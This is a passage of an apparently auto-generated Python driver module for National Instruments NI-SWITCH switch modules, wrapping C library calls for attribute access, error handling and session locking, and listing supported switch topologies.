double-clicking on it or by selecting it and then pressing .
'''
vi_ctype = _visatype.ViSession(self._vi) # case S110
channel_name_ctype = ctypes.create_string_buffer(self._repeated_capability.encode(self._encoding)) # case C010
attribute_id_ctype = _visatype.ViAttr(attribute_id) # case S150
attribute_value_ctype = _visatype.ViInt32() # case S220
error_code = self._library.niSwitch_GetAttributeViInt32(vi_ctype, channel_name_ctype, attribute_id_ctype, None if attribute_value_ctype is None else (ctypes.pointer(attribute_value_ctype)))
errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
return int(attribute_value_ctype.value)
@ivi_synchronized
def _get_attribute_vi_real64(self, attribute_id):
r'''_get_attribute_vi_real64
This method queries the value of a ViReal64 property. You can use
this method to get the values of instrument specific properties and
inherent IVI properties. If the property represents an instrument
state, this method performs instrument I/O in the following cases: -
State caching is disabled for the entire session or for the particular
property. - State caching is enabled and the currently cached value is
invalid.
Tip:
This method requires repeated capabilities (channels). If called directly on the
niswitch.Session object, then the method will use all repeated capabilities in the session.
You can specify a subset of repeated capabilities using the Python index notation on an
niswitch.Session repeated capabilities container, and calling this method on the result.:
session.channels[0,1]._get_attribute_vi_real64(attribute_id)
Args:
attribute_id (int): Pass the ID of a property. From the method panel window, you can use
this control as follows. - Click on the control or press , , or , to
display a dialog box containing a hierarchical list of the available
properties. Properties whose value cannot be set are dim. Help text is
shown for each property. Select a property by double-clicking on it
or by selecting it and then pressing . A ring control at the top of the
dialog box allows you to see all IVI properties or only the properties
of the ViInt32 type. If you choose to see all IVI properties, the data
types appear to the right of the property names in the list box. The
data types that are not consistent with this method are dim. If you
select a property data type that is dim, LabWindows/CVI transfers you
to the method panel for the corresponding method that is consistent
with the data type. - If you want to enter a variable name, press to
change this ring control to a manual input box. - If the property in
this ring control has constants as valid values, you can view the
constants by moving to the Property Value control and pressing .
Returns:
attribute_value (float): Returns the current value of the property. Pass the address of a
ViReal64 variable. From the method panel window, you can use this
control as follows. - If the property currently showing in the
Property ID ring control has constants as valid values, you can view a
list of the constants by pressing on this control. Select a value by
double-clicking on it or by selecting it and then pressing .
'''
vi_ctype = _visatype.ViSession(self._vi) # case S110
channel_name_ctype = ctypes.create_string_buffer(self._repeated_capability.encode(self._encoding)) # case C010
attribute_id_ctype = _visatype.ViAttr(attribute_id) # case S150
attribute_value_ctype = _visatype.ViReal64() # case S220
error_code = self._library.niSwitch_GetAttributeViReal64(vi_ctype, channel_name_ctype, attribute_id_ctype, None if attribute_value_ctype is None else (ctypes.pointer(attribute_value_ctype)))
errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
return float(attribute_value_ctype.value)
@ivi_synchronized
def _get_attribute_vi_string(self, attribute_id):
r'''_get_attribute_vi_string
This method queries the value of a ViString property. You can use
this method to get the values of instrument specific properties and
inherent IVI properties. If the property represents an instrument
state, this method performs instrument I/O in the following cases: -
State caching is disabled for the entire session or for the particular
property. - State caching is enabled and the currently cached value is
invalid. You must provide a ViChar array to serve as a buffer for the
value. You pass the number of bytes in the buffer as the Array Size
parameter. If the current value of the property, including the
terminating NULL byte, is larger than the size you indicate in the Array
Size parameter, the method copies Array Size-1 bytes into the buffer,
places an ASCII NULL byte at the end of the buffer, and returns the
array size you must pass to get the entire value. For example, if the
value is "123456" and the Array Size is 4, the method places "123"
into the buffer and returns 7. If you want to call this method just to
get the required array size, you can pass 0 for the Array Size and
VI_NULL for the Property Value buffer. If you want the method to
fill in the buffer regardless of the number of bytes in the value, pass
a negative number for the Array Size parameter.
Tip:
This method requires repeated capabilities (channels). If called directly on the
niswitch.Session object, then the method will use all repeated capabilities in the session.
You can specify a subset of repeated capabilities using the Python index notation on an
niswitch.Session repeated capabilities container, and calling this method on the result.:
session.channels[0,1]._get_attribute_vi_string(attribute_id)
Args:
attribute_id (int): Pass the ID of a property. From the method panel window, you can use
this control as follows. - Click on the control or press , , or , to
display a dialog box containing a hierarchical list of the available
properties. Properties whose value cannot be set are dim. Help text is
shown for each property. Select a property by double-clicking on it
or by selecting it and then pressing . A ring control at the top of the
dialog box allows you to see all IVI properties or only the properties
of the ViInt32 type. If you choose to see all IVI properties, the data
types appear to the right of the property names in the list box. The
data types that are not consistent with this method are dim. If you
select a property data type that is dim, LabWindows/CVI transfers you
to the method panel for the corresponding method that is consistent
with the data type. - If you want to enter a variable name, press to
change this ring control to a manual input box. - If the property in
this ring control has constants as valid values, you can view the
constants by moving to the Property Value control and pressing .
Returns:
attribute_value (str): The buffer in which the method returns the current value of the
property. The buffer must be of type ViChar and have at least as many
bytes as indicated in the Array Size parameter. If the current value of
the property, including the terminating NUL byte, contains more bytes
that you indicate in this parameter, the method copies Array Size-1
bytes into the buffer, places an ASCII NUL byte at the end of the
buffer, and returns the array size you must pass to get the entire
value. For example, if the value is "123456" and the Array Size is 4,
the method places "123" into the buffer and returns 7. If you specify
0 for the Array Size parameter, you can pass VI_NULL for this
parameter. From the method panel window, you can use this control as
follows. - If the property currently showing in the Property ID ring
control has constants as valid values, you can view a list of the
constants by pressing on this control. Select a value by double-clicking
on it or by selecting it and then pressing .
'''
vi_ctype = _visatype.ViSession(self._vi) # case S110
channel_name_ctype = ctypes.create_string_buffer(self._repeated_capability.encode(self._encoding)) # case C010
attribute_id_ctype = _visatype.ViAttr(attribute_id) # case S150
array_size_ctype = _visatype.ViInt32() # case S170
attribute_value_ctype = None # case C050
error_code = self._library.niSwitch_GetAttributeViString(vi_ctype, channel_name_ctype, attribute_id_ctype, array_size_ctype, attribute_value_ctype)
errors.handle_error(self, error_code, ignore_warnings=True, is_error_handling=False)
array_size_ctype = _visatype.ViInt32(error_code) # case S180
attribute_value_ctype = (_visatype.ViChar * array_size_ctype.value)() # case C060
error_code = self._library.niSwitch_GetAttributeViString(vi_ctype, channel_name_ctype, attribute_id_ctype, array_size_ctype, attribute_value_ctype)
errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
return attribute_value_ctype.value.decode(self._encoding)
def _get_error(self):
r'''_get_error
This method retrieves and then clears the IVI error information for
the session or the current execution thread. One exception exists: If
the buffer_size parameter is 0, the method does not clear the error
information. By passing 0 for the buffer size, the caller can ascertain
the buffer size required to get the entire error description string and
then call the method again with a sufficiently large buffer. If the
user specifies a valid IVI session for the InstrumentHandle parameter,
Get Error retrieves and then clears the error information for the
session. If the user passes VI_NULL for the InstrumentHandle parameter,
this method retrieves and then clears the error information for the
current execution thread. If the InstrumentHandle parameter is an
invalid session, the method does nothing and returns an error.
Normally, the error information describes the first error that occurred
since the user last called _get_error or ClearError.
Note:
One or more of the referenced methods are not in the Python API for this driver.
Returns:
code (int): Returns the error code for the session or execution thread. If you pass
0 for the Buffer Size, you can pass VI_NULL for this parameter.
description (str): Returns the error description for the IVI session or execution thread.
If there is no description, the method returns an empty string. The
buffer must contain at least as many elements as the value you specify
with the Buffer Size parameter. If the error description, including the
terminating NUL byte, contains more bytes than you indicate with the
Buffer Size parameter, the method copies Buffer Size - 1 bytes into
the buffer, places an ASCII NUL byte at the end of the buffer, and
returns the buffer size you must pass to get the entire value. For
example, if the value is "123456" and the Buffer Size is 4, the method
places "123" into the buffer and returns 7. If you pass 0 for the Buffer
Size, you can pass VI_NULL for this parameter.
'''
vi_ctype = _visatype.ViSession(self._vi) # case S110
code_ctype = _visatype.ViStatus() # case S220
buffer_size_ctype = _visatype.ViInt32() # case S170
description_ctype = None # case C050
error_code = self._library.niSwitch_GetError(vi_ctype, None if code_ctype is None else (ctypes.pointer(code_ctype)), buffer_size_ctype, description_ctype)
errors.handle_error(self, error_code, ignore_warnings=True, is_error_handling=True)
buffer_size_ctype = _visatype.ViInt32(error_code) # case S180
description_ctype = (_visatype.ViChar * buffer_size_ctype.value)() # case C060
error_code = self._library.niSwitch_GetError(vi_ctype, None if code_ctype is None else (ctypes.pointer(code_ctype)), buffer_size_ctype, description_ctype)
errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=True)
return int(code_ctype.value), description_ctype.value.decode(self._encoding)
def lock(self):
'''lock
Obtains a multithread lock on the device session. Before doing so, the
software waits until all other execution threads release their locks
on the device session.
Other threads may have obtained a lock on this session for the
following reasons:
- The application called the lock method.
- A call to NI-SWITCH locked the session.
- After a call to the lock method returns
successfully, no other threads can access the device session until
you call the unlock method or exit out of the with block when using
lock context manager.
- Use the lock method and the
unlock method around a sequence of calls to
instrument driver methods if you require that the device retain its
settings through the end of the sequence.
You can safely make nested calls to the lock method
within the same thread. To completely unlock the session, you must
balance each call to the lock method with a call to
the unlock method.
Returns:
lock (context manager): When used in a with statement, niswitch.Session.lock acts as
a context manager and unlock will be called when the with block is exited
'''
self._lock_session() # We do not call _lock_session() in the context manager so that this function can
# act standalone as well and let the client call unlock() explicitly. If they do use the context manager,
# that will handle the unlock for them
return _Lock(self)
def _lock_session(self):
'''_lock_session
Actual call to driver
'''
vi_ctype = _visatype.ViSession(self._vi) # case S110
error_code = self._library.niSwitch_LockSession(vi_ctype, None)
errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=True)
return
@ivi_synchronized
def _set_attribute_vi_boolean(self, attribute_id, attribute_value):
r'''_set_attribute_vi_boolean
This method sets the value of a ViBoolean property. This is a
low-level method that you can use to set the values of
instrument-specific properties and inherent IVI properties. If the
property represents an instrument state, this method performs
instrument I/O in the following cases: - State caching is disabled for
the entire session or for the particular property. - State caching is
enabled and the currently cached value is invalid or is different than
the value you specify. This instrument driver contains high-level
methods that set most of the instrument properties. It is best to use
the high-level driver methods as much as possible. They handle order
dependencies and multithread locking for you. In addition, they perform
status checking only after setting all of the properties. In contrast,
when you set multiple properties using the SetAttribute methods, the
methods check the instrument status after each call. Also, when state
caching is enabled, the high-level methods that configure multiple
properties perform instrument I/O only for the properties whose value
you change. Thus, you can safely call the high-level methods without
the penalty of redundant instrument I/O.
Tip:
This method requires repeated capabilities (channels). If called directly on the
niswitch.Session object, then the method will use all repeated capabilities in the session.
You can specify a subset of repeated capabilities using the Python index notation on an
niswitch.Session repeated capabilities container, and calling this method on the result.:
session.channels[0,1]._set_attribute_vi_boolean(attribute_id, attribute_value)
Args:
attribute_id (int): Pass the ID of a property. From the method panel window, you can use
this control as follows. - Click on the control or press , , or , to
display a dialog box containing a hierarchical list of the available
properties. Properties whose value cannot be set are dim. Help text is
shown for each property. Select a property by double-clicking on it
or by selecting it and then pressing . Read-only properties appear dim
in the list box. If you select a read-only property, an error message
appears. A ring control at the top of the dialog box allows you to see
all IVI properties or only the properties of the ViInt32 type. If you
choose to see all IVI properties, the data types appear to the right of
the property names in the list box. The data types that are not
consistent with this method are dim. If you select a property data
type that is dim, LabWindows/CVI transfers you to the method panel for
the corresponding method that is consistent with the data type. - If
you want to enter a variable name, press to change this ring control to
a manual input box. - If the property in this ring control has
constants as valid values, you can view the constants by moving to the
Property Value control and pressing .
attribute_value (bool): Pass the value to which you want to set the property. From the method
panel window, you can use this control as follows. - If the property
currently showing in the Property ID ring control has constants as
valid values, you can view a list of the constants by pressing on this
control. Select a value by double-clicking on it or by selecting it and
then pressing . Note: Some of the values might not be valid depending on
the current settings of the instrument session. Default Value: none
'''
vi_ctype = _visatype.ViSession(self._vi) # case S110
channel_name_ctype = ctypes.create_string_buffer(self._repeated_capability.encode(self._encoding)) # case C010
attribute_id_ctype = _visatype.ViAttr(attribute_id) # case S150
attribute_value_ctype = _visatype.ViBoolean(attribute_value) # case S150
error_code = self._library.niSwitch_SetAttributeViBoolean(vi_ctype, channel_name_ctype, attribute_id_ctype, attribute_value_ctype)
errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
return
@ivi_synchronized
def _set_attribute_vi_int32(self, attribute_id, attribute_value):
r'''_set_attribute_vi_int32
This method sets the value of a ViInt32 property. This is a low-level
method that you can use to set the values of instrument-specific
properties and inherent IVI properties. If the property represents an
instrument state, this method performs instrument I/O in the following
cases: - State caching is disabled for the entire session or for the
particular property. - State caching is enabled and the currently
cached value is invalid or is different than the value you specify. This
instrument driver contains high-level methods that set most of the
instrument properties. It is best to use the high-level driver methods
as much as possible. They handle order dependencies and multithread
locking for you. In addition, they perform status checking only after
setting all of the properties. In contrast, when you set multiple
properties using the SetAttribute methods, the methods check the
instrument status after each call. Also, when state caching is enabled,
the high-level methods that configure multiple properties perform
instrument I/O only for the properties whose value you change. Thus, you
can safely call the high-level methods without the penalty of
redundant instrument I/O.
Tip:
This method requires repeated capabilities (channels). If called directly on the
niswitch.Session object, then the method will use all repeated capabilities in the session.
You can specify a subset of repeated capabilities using the Python index notation on an
niswitch.Session repeated capabilities container, and calling this method on the result.:
session.channels[0,1]._set_attribute_vi_int32(attribute_id, attribute_value)
Args:
attribute_id (int): Pass the ID of a property. From the method panel window, you can use
this control as follows. - Click on the control or press , , or , to
display a dialog box containing a hierarchical list of the available
properties. Properties whose value cannot be set are dim. Help text is
shown for each property. Select a property by double-clicking on it
or by selecting it and then pressing . Read-only properties appear dim
in the list box. If you select a read-only property, an error message
appears. A ring control at the top of the dialog box allows you to see
all IVI properties or only the properties of the ViInt32 type. If you
choose to see all IVI properties, the data types appear to the right of
the property names in the list box. The data types that are not
consistent with this method are dim. If you select a property data
type that is dim, LabWindows/CVI transfers you to the method panel for
the corresponding method that is consistent with the data type. - If
you want to enter a variable name, press to change this ring control to
a manual input box. - If the property in this ring control has
constants as valid values, you can view the constants by moving to the
Property Value control and pressing .
attribute_value (int): Pass the value to which you want to set the property. From the method
panel window, you can use this control as follows. - If the property
currently showing in the Property ID ring control has constants as
valid values, you can view a list of the constants by pressing on this
control. Select a value by double-clicking on it or by selecting it and
then pressing . Note: Some of the values might not be valid depending on
the current settings of the instrument session. Default Value: none
'''
vi_ctype = _visatype.ViSession(self._vi) # case S110
channel_name_ctype = ctypes.create_string_buffer(self._repeated_capability.encode(self._encoding)) # case C010
attribute_id_ctype = _visatype.ViAttr(attribute_id) # case S150
attribute_value_ctype = _visatype.ViInt32(attribute_value) # case S150
error_code = self._library.niSwitch_SetAttributeViInt32(vi_ctype, channel_name_ctype, attribute_id_ctype, attribute_value_ctype)
errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
return
@ivi_synchronized
def _set_attribute_vi_real64(self, attribute_id, attribute_value):
r'''_set_attribute_vi_real64
This method sets the value of a ViReal64 property. This is a
low-level method that you can use to set the values of
instrument-specific properties and inherent IVI properties. If the
property represents an instrument state, this method performs
instrument I/O in the following cases: - State caching is disabled for
the entire session or for the particular property. - State caching is
enabled and the currently cached value is invalid or is different than
the value you specify. This instrument driver contains high-level
methods that set most of the instrument properties. It is best to use
the high-level driver methods as much as possible. They handle order
dependencies and multithread locking for you. In addition, they perform
status checking only after setting all of the properties. In contrast,
when you set multiple properties using the SetAttribute methods, the
methods check the instrument status after each call. Also, when state
caching is enabled, the high-level methods that configure multiple
properties perform instrument I/O only for the properties whose value
you change. Thus, you can safely call the high-level methods without
the penalty of redundant instrument I/O.
Tip:
This method requires repeated capabilities (channels). If called directly on the
niswitch.Session object, then the method will use all repeated capabilities in the session.
You can specify a subset of repeated capabilities using the Python index notation on an
niswitch.Session repeated capabilities container, and calling this method on the result.:
session.channels[0,1]._set_attribute_vi_real64(attribute_id, attribute_value)
Args:
attribute_id (int): Pass the ID of a property. From the method panel window, you can use
this control as follows. - Click on the control or press , , or , to
display a dialog box containing a hierarchical list of the available
properties. Properties whose value cannot be set are dim. Help text is
shown for each property. Select a property by double-clicking on it
or by selecting it and then pressing . Read-only properties appear dim
in the list box. If you select a read-only property, an error message
appears. A ring control at the top of the dialog box allows you to see
all IVI properties or only the properties of the ViInt32 type. If you
choose to see all IVI properties, the data types appear to the right of
the property names in the list box. The data types that are not
consistent with this method are dim. If you select a property data
type that is dim, LabWindows/CVI transfers you to the method panel for
the corresponding method that is consistent with the data type. - If
you want to enter a variable name, press to change this ring control to
a manual input box. - If the property in this ring control has
constants as valid values, you can view the constants by moving to the
Property Value control and pressing .
attribute_value (float): Pass the value to which you want to set the property. From the method
panel window, you can use this control as follows. - If the property
currently showing in the Property ID ring control has constants as
valid values, you can view a list of the constants by pressing on this
control. Select a value by double-clicking on it or by selecting it and
then pressing . Note: Some of the values might not be valid depending on
the current settings of the instrument session. Default Value: none
'''
vi_ctype = _visatype.ViSession(self._vi) # case S110
channel_name_ctype = ctypes.create_string_buffer(self._repeated_capability.encode(self._encoding)) # case C010
attribute_id_ctype = _visatype.ViAttr(attribute_id) # case S150
attribute_value_ctype = _visatype.ViReal64(attribute_value) # case S150
error_code = self._library.niSwitch_SetAttributeViReal64(vi_ctype, channel_name_ctype, attribute_id_ctype, attribute_value_ctype)
errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
return
@ivi_synchronized
def _set_attribute_vi_string(self, attribute_id, attribute_value):
r'''_set_attribute_vi_string
This method sets the value of a ViString property. This is a
low-level method that you can use to set the values of
instrument-specific properties and inherent IVI properties. If the
property represents an instrument state, this method performs
instrument I/O in the following cases: - State caching is disabled for
the entire session or for the particular property. - State caching is
enabled and the currently cached value is invalid or is different than
the value you specify. This instrument driver contains high-level
methods that set most of the instrument properties. It is best to use
the high-level driver methods as much as possible. They handle order
dependencies and multithread locking for you. In addition, they perform
status checking only after setting all of the properties. In contrast,
when you set multiple properties using the SetAttribute methods, the
methods check the instrument status after each call. Also, when state
caching is enabled, the high-level methods that configure multiple
properties perform instrument I/O only for the properties whose value
you change. Thus, you can safely call the high-level methods without
the penalty of redundant instrument I/O.
Tip:
This method requires repeated capabilities (channels). If called directly on the
niswitch.Session object, then the method will use all repeated capabilities in the session.
You can specify a subset of repeated capabilities using the Python index notation on an
niswitch.Session repeated capabilities container, and calling this method on the result.:
session.channels[0,1]._set_attribute_vi_string(attribute_id, attribute_value)
Args:
attribute_id (int): Pass the ID of a property. From the method panel window, you can use
this control as follows. - Click on the control or press , , or , to
display a dialog box containing a hierarchical list of the available
properties. Properties whose value cannot be set are dim. Help text is
shown for each property. Select a property by double-clicking on it
or by selecting it and then pressing . Read-only properties appear dim
in the list box. If you select a read-only property, an error message
appears. A ring control at the top of the dialog box allows you to see
all IVI properties or only the properties of the ViInt32 type. If you
choose to see all IVI properties, the data types appear to the right of
the property names in the list box. The data types that are not
consistent with this method are dim. If you select a property data
type that is dim, LabWindows/CVI transfers you to the method panel for
the corresponding method that is consistent with the data type. - If
you want to enter a variable name, press to change this ring control to
a manual input box. - If the property in this ring control has
constants as valid values, you can view the constants by moving to the
Property Value control and pressing .
attribute_value (str): Pass the value to which you want to set the property. From the method
panel window, you can use this control as follows. - If the property
currently showing in the Property ID ring control has constants as
valid values, you can view a list of the constants by pressing on this
control. Select a value by double-clicking on it or by selecting it and
then pressing . Note: Some of the values might not be valid depending on
the current settings of the instrument session. Default Value: none
'''
vi_ctype = _visatype.ViSession(self._vi) # case S110
channel_name_ctype = ctypes.create_string_buffer(self._repeated_capability.encode(self._encoding)) # case C010
attribute_id_ctype = _visatype.ViAttr(attribute_id) # case S150
attribute_value_ctype = ctypes.create_string_buffer(attribute_value.encode(self._encoding)) # case C020
error_code = self._library.niSwitch_SetAttributeViString(vi_ctype, channel_name_ctype, attribute_id_ctype, attribute_value_ctype)
errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
return
def unlock(self):
'''unlock
Releases a lock that you acquired on an device session using
lock. Refer to lock for additional
information on session locks.
'''
vi_ctype = _visatype.ViSession(self._vi) # case S110
error_code = self._library.niSwitch_UnlockSession(vi_ctype, None)
errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=True)
return
def _error_message(self, error_code):
r'''_error_message
Converts an error code returned by NI-SWITCH into a user-readable
string. Generally this information is supplied in error out of any
NI-SWITCH VI. Use _error_message for a static lookup of an
error code description.
Args:
error_code (int): Status code returned by any NI-SWITCH method. Default Value: 0
(VI_SUCCESS)
Returns:
error_message (str): The error information formatted into a string. You must pass a ViChar
array with at least 256 bytes.
'''
vi_ctype = _visatype.ViSession(self._vi) # case S110
error_code_ctype = _visatype.ViStatus(error_code) # case S150
error_message_ctype = (_visatype.ViChar * 256)() # case C070
error_code = self._library.niSwitch_error_message(vi_ctype, error_code_ctype, error_message_ctype)
errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=True)
return error_message_ctype.value.decode(self._encoding)
class Session(_SessionBase):
'''An NI-SWITCH session to a National Instruments Switch Module'''
def __init__(self, resource_name, topology="Configured Topology", simulate=False, reset_device=False):
r'''An NI-SWITCH session to a National Instruments Switch Module
Returns a session handle used to identify the switch in all subsequent
instrument driver calls and sets the topology of the switch.
__init__ creates a new IVI instrument driver session
for the switch specified in the resourceName parameter. The driver uses
the topology specified in the topology parameter and overrides the
topology specified in MAX. Note: When initializing an NI SwitchBlock
device with topology, you must specify the toplogy created when you
configured the device in MAX, using either
NISWITCH_TOPOLOGY_CONFIGURED_TOPOLOGY or the toplogy string of the
device. Refer to the Initializing with Toplogy for NI SwitchBlock
Devices topic in the NI Switches Help for information about determining
the topology string of an NI SwitchBlock device. By default, the switch
is reset to a known state. Enable simulation by specifying the topology
and setting the simulate parameter to True.
Args:
resource_name (str): Resource name of the switch module to initialize. Default value: None
Syntax: Optional fields are shown in square brackets ([]). Configured in
MAX Under Valid Syntax Devices and Interfaces DeviceName Traditional
NI-DAQ Devices SCXI[chassis ID]::slot number PXI System PXI[bus
number]::device number TIP: IVI logical names are also valid for the
resource name. Default values for optional fields: chassis ID = 1 bus
number = 0 Example resource names: Resource Name Description SC1Mod3
NI-DAQmx module in chassis "SC1" slot 3 MySwitch NI-DAQmx module renamed
to "MySwitch" SCXI1::3 Traditional NI-DAQ module in chassis 1, slot 3
SCXI::3 Traditional NI-DAQ module in chassis 1, slot 3 PXI0::16 PXI bus
0, device number 16 PXI::16 PXI bus 0, device number 16
topology (str): Pass the topology name you want to use for the switch you specify with
Resource Name parameter. You can also pass
NISWITCH_TOPOLOGY_CONFIGURED_TOPOLOGY to use the last topology that
was configured for the device in MAX. Default Value:
NISWITCH_TOPOLOGY_CONFIGURED_TOPOLOGY Valid Values:
NISWITCH_TOPOLOGY_1127_1_WIRE_64X1_MUX
NISWITCH_TOPOLOGY_1127_2_WIRE_32X1_MUX
NISWITCH_TOPOLOGY_1127_2_WIRE_4X8_MATRIX
NISWITCH_TOPOLOGY_1127_4_WIRE_16X1_MUX
NISWITCH_TOPOLOGY_1127_INDEPENDENT
NISWITCH_TOPOLOGY_1128_1_WIRE_64X1_MUX
NISWITCH_TOPOLOGY_1128_2_WIRE_32X1_MUX
NISWITCH_TOPOLOGY_1128_2_WIRE_4X8_MATRIX
NISWITCH_TOPOLOGY_1128_4_WIRE_16X1_MUX
NISWITCH_TOPOLOGY_1128_INDEPENDENT
NISWITCH_TOPOLOGY_1129_2_WIRE_16X16_MATRIX
NISWITCH_TOPOLOGY_1129_2_WIRE_8X32_MATRIX
NISWITCH_TOPOLOGY_1129_2_WIRE_4X64_MATRIX
NISWITCH_TOPOLOGY_1129_2_WIRE_DUAL_8X16_MATRIX
NISWITCH_TOPOLOGY_1129_2_WIRE_DUAL_4X32_MATRIX
NISWITCH_TOPOLOGY_1129_2_WIRE_QUAD_4X16_MATRIX
NISWITCH_TOPOLOGY_1130_1_WIRE_256X1_MUX
NISWITCH_TOPOLOGY_1130_1_WIRE_DUAL_128X1_MUX
NISWITCH_TOPOLOGY_1130_1_WIRE_4X64_MATRIX
NISWITCH_TOPOLOGY_1130_1_WIRE_8x32_MATRIX
NISWITCH_TOPOLOGY_1130_1_WIRE_OCTAL_32X1_MUX
NISWITCH_TOPOLOGY_1130_1_WIRE_QUAD_64X1_MUX
NISWITCH_TOPOLOGY_1130_1_WIRE_SIXTEEN_16X1_MUX
NISWITCH_TOPOLOGY_1130_2_WIRE_4X32_MATRIX
NISWITCH_TOPOLOGY_1130_2_WIRE_128X1_MUX
NISWITCH_TOPOLOGY_1130_2_WIRE_OCTAL_16X1_MUX
NISWITCH_TOPOLOGY_1130_2_WIRE_QUAD_32X1_MUX
NISWITCH_TOPOLOGY_1130_4_WIRE_64X1_MUX
NISWITCH_TOPOLOGY_1130_4_WIRE_QUAD_16X1_MUX
NISWITCH_TOPOLOGY_1130_INDEPENDENT NISWITCH_TOPOLOGY_1160_16_SPDT
NISWITCH_TOPOLOGY_1161_8_SPDT
NISWITCH_TOPOLOGY_1163R_OCTAL_4X1_MUX
NISWITCH_TOPOLOGY_1166_16_DPDT NISWITCH_TOPOLOGY_1166_32_SPDT
NISWITCH_TOPOLOGY_1167_INDEPENDENT
NISWITCH_TOPOLOGY_1169_100_SPST NISWITCH_TOPOLOGY_1169_50_DPST
NISWITCH_TOPOLOGY_1175_1_WIRE_196X1_MUX
NISWITCH_TOPOLOGY_1175_2_WIRE_98X1_MUX
NISWITCH_TOPOLOGY_1175_2_WIRE_95X1_MUX
NISWITCH_TOPOLOGY_1190_QUAD_4X1_MUX
NISWITCH_TOPOLOGY_1191_QUAD_4X1_MUX
NISWITCH_TOPOLOGY_1192_8_SPDT NISWITCH_TOPOLOGY_1193_32X1_MUX
NISWITCH_TOPOLOGY_1193_16X1_TERMINATED_MUX
NISWITCH_TOPOLOGY_1193_DUAL_16X1_MUX
NISWITCH_TOPOLOGY_1193_DUAL_8X1_TERMINATED_MUX
NISWITCH_TOPOLOGY_1193_QUAD_8X1_MUX
NISWITCH_TOPOLOGY_1193_QUAD_4X1_TERMINATED_MUX
NISWITCH_TOPOLOGY_1193_INDEPENDENT
NISWITCH_TOPOLOGY_1194_QUAD_4X1_MUX
NISWITCH_TOPOLOGY_1195_QUAD_4X1_MUX
NISWITCH_TOPOLOGY_2501_1_WIRE_48X1_MUX
NISWITCH_TOPOLOGY_2501_1_WIRE_48X1_AMPLIFIED_MUX
NISWITCH_TOPOLOGY_2501_2_WIRE_24X1_MUX
NISWITCH_TOPOLOGY_2501_2_WIRE_24X1_AMPLIFIED_MUX
NISWITCH_TOPOLOGY_2501_2_WIRE_DUAL_12X1_MUX
NISWITCH_TOPOLOGY_2501_2_WIRE_QUAD_6X1_MUX
NISWITCH_TOPOLOGY_2501_2_WIRE_4X6_MATRIX
NISWITCH_TOPOLOGY_2501_4_WIRE_12X1_MUX
NISWITCH_TOPOLOGY_2503_1_WIRE_48X1_MUX
NISWITCH_TOPOLOGY_2503_2_WIRE_24X1_MUX
NISWITCH_TOPOLOGY_2503_2_WIRE_DUAL_12X1_MUX
NISWITCH_TOPOLOGY_2503_2_WIRE_QUAD_6X1_MUX
NISWITCH_TOPOLOGY_2503_2_WIRE_4X6_MATRIX
NISWITCH_TOPOLOGY_2503_4_WIRE_12X1_MUX
NISWITCH_TOPOLOGY_2510_INDEPENDENT
NISWITCH_TOPOLOGY_2512_INDEPENDENT
NISWITCH_TOPOLOGY_2514_INDEPENDENT
NISWITCH_TOPOLOGY_2515_INDEPENDENT NISWITCH_TOPOLOGY_2520_80_SPST
NISWITCH_TOPOLOGY_2521_40_DPST NISWITCH_TOPOLOGY_2522_53_SPDT
NISWITCH_TOPOLOGY_2523_26_DPDT
NISWITCH_TOPOLOGY_2524_1_WIRE_128X1_MUX
NISWITCH_TOPOLOGY_2524_1_WIRE_DUAL_64X1_MUX
NISWITCH_TOPOLOGY_2524_1_WIRE_QUAD_32X1_MUX
NISWITCH_TOPOLOGY_2524_1_WIRE_OCTAL_16X1_MUX
NISWITCH_TOPOLOGY_2524_1_WIRE_SIXTEEN_8X1_MUX
NISWITCH_TOPOLOGY_2525_2_WIRE_64X1_MUX
NISWITCH_TOPOLOGY_2525_2_WIRE_DUAL_32X1_MUX
NISWITCH_TOPOLOGY_2525_2_WIRE_QUAD_16X1_MUX
NISWITCH_TOPOLOGY_2525_2_WIRE_OCTAL_8X1_MUX
NISWITCH_TOPOLOGY_2525_2_WIRE_SIXTEEN_4X1_MUX
NISWITCH_TOPOLOGY_2526_1_WIRE_158X1_MUX
NISWITCH_TOPOLOGY_2526_2_WIRE_79X1_MUX
NISWITCH_TOPOLOGY_2527_1_WIRE_64X1_MUX
NISWITCH_TOPOLOGY_2527_1_WIRE_DUAL_32X1_MUX
NISWITCH_TOPOLOGY_2527_2_WIRE_32X1_MUX
NISWITCH_TOPOLOGY_2527_2_WIRE_DUAL_16X1_MUX
NISWITCH_TOPOLOGY_2527_4_WIRE_16X1_MUX
NISWITCH_TOPOLOGY_2527_INDEPENDENT
NISWITCH_TOPOLOGY_2529_2_WIRE_DUAL_4X16_MATRIX
NISWITCH_TOPOLOGY_2529_2_WIRE_8X16_MATRIX
NISWITCH_TOPOLOGY_2529_2_WIRE_4X32_MATRIX
NISWITCH_TOPOLOGY_2530_1_WIRE_128X1_MUX
NISWITCH_TOPOLOGY_2530_1_WIRE_DUAL_64X1_MUX
NISWITCH_TOPOLOGY_2530_1_WIRE_4x32_MATRIX
NISWITCH_TOPOLOGY_2530_1_WIRE_8x16_MATRIX
NISWITCH_TOPOLOGY_2530_1_WIRE_OCTAL_16X1_MUX
NISWITCH_TOPOLOGY_2530_1_WIRE_QUAD_32X1_MUX
NISWITCH_TOPOLOGY_2530_2_WIRE_4x16_MATRIX
NISWITCH_TOPOLOGY_2530_2_WIRE_64X1_MUX
NISWITCH_TOPOLOGY_2530_2_WIRE_DUAL_32X1_MUX
NISWITCH_TOPOLOGY_2530_2_WIRE_QUAD_16X1_MUX
NISWITCH_TOPOLOGY_2530_4_WIRE_32X1_MUX
NISWITCH_TOPOLOGY_2530_4_WIRE_DUAL_16X1_MUX
NISWITCH_TOPOLOGY_2530_INDEPENDENT
NISWITCH_TOPOLOGY_2531_1_WIRE_4X128_MATRIX
NISWITCH_TOPOLOGY_2531_1_WIRE_8X64_MATRIX
NISWITCH_TOPOLOGY_2531_1_WIRE_DUAL_4X64_MATRIX
NISWITCH_TOPOLOGY_2531_1_WIRE_DUAL_8X32_MATRIX
